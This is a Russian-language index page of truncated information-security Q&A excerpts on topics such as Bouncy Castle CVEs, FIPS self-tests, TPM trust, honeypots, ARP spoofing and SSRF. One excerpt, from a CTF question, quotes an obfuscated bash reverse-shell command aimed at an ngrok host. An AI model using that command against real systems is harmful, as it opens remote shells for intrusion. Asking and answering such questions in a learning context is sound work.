Вопросы и Ответы по Информационной Безопасности
Информационная безопасность
Вопрос или проблема Я обнаружил в коде использование библиотеки Bouncy Castle, уязвимой к CVE CVE-2023-33201. Эта уязвимость, похоже, связана с классом X509LDAPCertStoreSpi.java, и конкретно с методом search(). В проверяемом мною коде нет прямого использования этого класса или метода.
Информационная безопасность
Вопрос или проблема Я просто знаю, что все будут кричать на меня, что публичный ключ лучше, но позвольте мне сначала изложить реальный сценарий. У меня есть небольшая локальная сеть дома, в основном я единственный регулярный пользователь, но другие члены
Информационная безопасность
Вопрос или проблема В профессиональном контексте пользователи в идеале должны иметь предоставленные компанией компьютеры, предоставленные компанией смартфоны (если это необходимо) и управляемые учетные записи Microsoft/Apple. Тогда все будет в порядке
Информационная безопасность
Вопрос или проблема Я обнаружил в коде использование библиотеки bouncy castle, которая уязвима по CVE CVE-2023-33201. Эта уязвимость, похоже, исходит от класса X509LDAPCertStoreSpi.java, и в частности от метода search(). В коде, который я тестирую, нет
Информационная безопасность
Вопрос или проблема FIPS 140-3 10.2.A Техника самоиспытания целостности перед эксплуатацией вводит новые требования. Ранее, в FIPS 140-2, проводилось самоиспытание при включении для того, чтобы можно было использовать определённую часть криптографического модуля (например, RSA).
Информационная безопасность
Вопрос или проблема На этот вопрос уже есть ответы здесь: Что делает TPM “доверенным”? (2 ответа) Что может помешать плохому BIOS обмануть TPM? (1 ответ) Закрыто 22 минуты назад. Я немного исследовал вопрос TPM и вижу его так: он надежно хранит
Информационная безопасность
Вопрос или проблема Недавно я узнал о DOSBox-X. Это, по сути, несколько менее ужасная версия в основном заброшенного DOSBox. Сейчас он у меня установлен внутри виртуальной машины Windows 10 на моем ПК с Windows 10. Это единственный компьютер, который у меня есть.
Информационная безопасность
Вопрос или проблема В настоящее время я реализую скрипт PowerShell для вызова API Sophos (https://developer.sophos.com/intro). Write-Output "`nВведите ключ API Sophos / клиентский секрет." $ClientSecret = Read-Host -AsSecureString $Ptr = [System.
Информационная безопасность
Вопрос или проблема В настоящее время я занимаюсь проектом по FTP-отскакиванию, и после ознакомления с материалами я по-прежнему не совсем понимаю, как это работает/может работать. Буду признателен, если смогу получить разъяснения от экспертов здесь.
Информационная безопасность
Вопрос или проблема Прошло несколько лет с тех пор, как я играл с этим, так что не уверен, изменились ли времена. При использовании чипсета AR7921 (Alfa AWUS036NHA) на Ubuntu 20.04 я могу увидеть множество сетей, используя следующие команды airodump-ng
Информационная безопасность
Вопрос или проблема Мне трудно понять различия между jar-файлами bc-prov и bc-fips. Я понимаю, что bc-fips содержит подмножество пакетов bc-prov. Но я хочу больше узнать о следующих вопросах: Будет ли какое-либо влияние на производительность при обновлении
Информационная безопасность
Вопрос или проблема В последнее время я тестировал свою беспроводную сеть на наличие общих атак, одной из которых является arp-спуфинг, а также атаки, вытекающие из успешного arp-спуфинга, такие как dns-поиск с подменой. (Я использую bettercap) На всех
Информационная безопасность
Вопрос или проблема $(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27') -i: -c: строка 1: неожиданное EOF при поиске соответствующей `'' Я пытался получить обратный шелл таким образом для CTF
Информационная безопасность
Вопрос или проблема Поскольку VPS, на котором я установил t-pot, не имеет графических карт (GPU), я должен подключаться к honeypot через RDP. Я подключаюсь к honeypot t-pot напрямую со своего основного компьютера. Существуют ли риски для моего основного компьютера из-за этого?
Информационная безопасность
Вопрос или проблема Я нашел этот интересный вопрос: может ли уязвимость переполнения целого числа быть использована в атаке? Как мне на практике найти следующую инструкцию (в gdb), чтобы я мог перезаписать адрес возврата и выполнить оболочный код?
Информационная безопасность
Вопрос или проблема tldr: Использование скрипта, запущенного из моего основного процесса, который читает только часть чувствительного файла, а затем передает результат в мой основной процесс – будет ли это иметь какую-либо пользу?
Информационная безопасность
Вопрос или проблема У меня есть проблема. Я являюсь промежуточным звеном сообщений и хочу приоритизировать конфиденциальность пользователей настолько, насколько это возможно. К сожалению, есть одна проблема. Я не могу разработать свою систему для реализации
Информационная безопасность
Вопрос или проблема Я случайно отформатировал Windows-машину на своем SSD-диске Western Digital. Я прервал процесс всего через несколько секунд, но после этого диск выдает ошибку. У тома нет поддерживаемой файловой системы и всегда запрашивает форматирование перед продолжением.
Информационная безопасность
Вопрос или проблема Если база данных с паролями утечет, пользователь просто может создать другой пароль. Сегодня биометрические проверки безопасности, такие как сканеры отпечатков пальцев и распознавание лиц, часто продвигаются как хорошие меры безопасности
Информационная безопасность
Вопрос или проблема Сначала позвольте мне кратко изложить, как работает SSRF: 1) Вы настраиваете изображение SVG с ссылкой на ваш сервер через xlink. Вот пример, который работает: <?xml version=”1.0″ encoding=”